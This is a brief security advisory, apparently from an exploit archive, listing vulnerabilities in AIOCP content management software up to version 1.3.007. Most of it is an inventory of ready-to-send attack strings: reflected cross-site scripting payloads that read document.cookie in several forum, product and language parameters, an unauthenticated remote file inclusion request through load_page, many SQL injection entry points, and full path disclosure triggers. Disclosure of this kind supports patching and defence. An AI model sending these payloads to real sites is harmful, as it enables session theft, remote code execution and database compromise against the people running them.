AIOCP versions 1.3.007 and below suffer from SQL injection, remote file inclusion, and cross site scripting vulnerabilities.
31f2b53b6bb1d1c42c85a9b5019719701d9ad6460728139ad5e0d99e0c3d5ce1
AIOCP <=1.3.007 multiples vulnerabilities[injection sql , remote file include , xss]
XSS get =
- /public/code/cp_forum_view.php?fmode=top&topid=</textarea>'"><script>alert(document.cookie)</script>
- /public/code/cp_forum_view.php?fmode=top&topid=53&forid=</textarea>'"><script>alert(document.cookie)</script>
- /public/code/cp_forum_view.php?fmode=top&topid=53&forid=23&catid=</textarea>'"><script>alert(document.cookie)</script>
- /public/code/cp_dpage.php?choosed_language=</textarea>'"><script>alert(document.cookie)</script>
- /public/code/cp_forum_view.php?fmode=top&topid=53&forid=</textarea>'"><script>alert(document.cookie)</script>
- /public/code/cp_forum_view.php?fmode=top&topid=53&forid=3&catid=</textarea>'"><script>alert(document.cookie)</script>
- /public/code/cp_show_ec_products.php?order_field=</textarea>'"><script>alert(document.cookie)</script>
- /public/code/cp_users_online.php?order_field=</textarea>'"><script>alert(document.cookie)</script>
- /public/code/cp_links_search.php?orderdir=</textarea>'"><script>alert(document.cookie)</script>
xss post in user profile :
- signature
- fiscal code
remote file include =
/admin/code/index.php?load_page=http%3A//google.com
( no login needed for the remote file include )
sql injection =
- /public/code/cp_dpage.php?choosed_language=[sql]
- /public/code/cp_news.php?choosed_language=[sql]
- /public/code/cp_news.php?news_category=[sql]
- /public/code/cp_forum_view.php?choosed_language=[sql]
- /public/code/cp_edit_user.php?choosed_language=[sql]
- /public/code/cp_newsletter.php?nlmsg_nlcatid=[sql]
- /public/code/cp_newsletter.php?choosed_language=[sql]
- /public/code/cp_links.php?links_category=[sql]
- /public/code/cp_links.php?choosed_language=[sql]
- /public/code/cp_contact_us.php?choosed_language=[sql]
- /public/code/cp_show_ec_products.php?product_category_id=[sql]
- /public/code/cp_show_ec_products.php?product_category_id=[sql]
- /public/code/cp_show_ec_products.php?order_field=[sql]
- /public/code/cp_login.php?choosed_language=[sql]
- /public/code/cp_users_online.php?order_field=cpsession_expiry&submitted=1&firstrow=[sql]
- /public/code/cp_codice_fiscale.php?choosed_language=[sql]
- /public/code/cp_links_search.php?orderdir=[sql]
full path disclosure =
- /public/code/cp_dpage.php?choosed_language=eng&aiocp_dp[]=_main
- /public/code/cp_show_ec_products.php?order_field[]=
- /public/code/cp_show_page_help.php?hp[]=
global risk = hight
laurent gaffié & benjamin mossé
https://s-a-p.ca/
saps.audit@gmail.com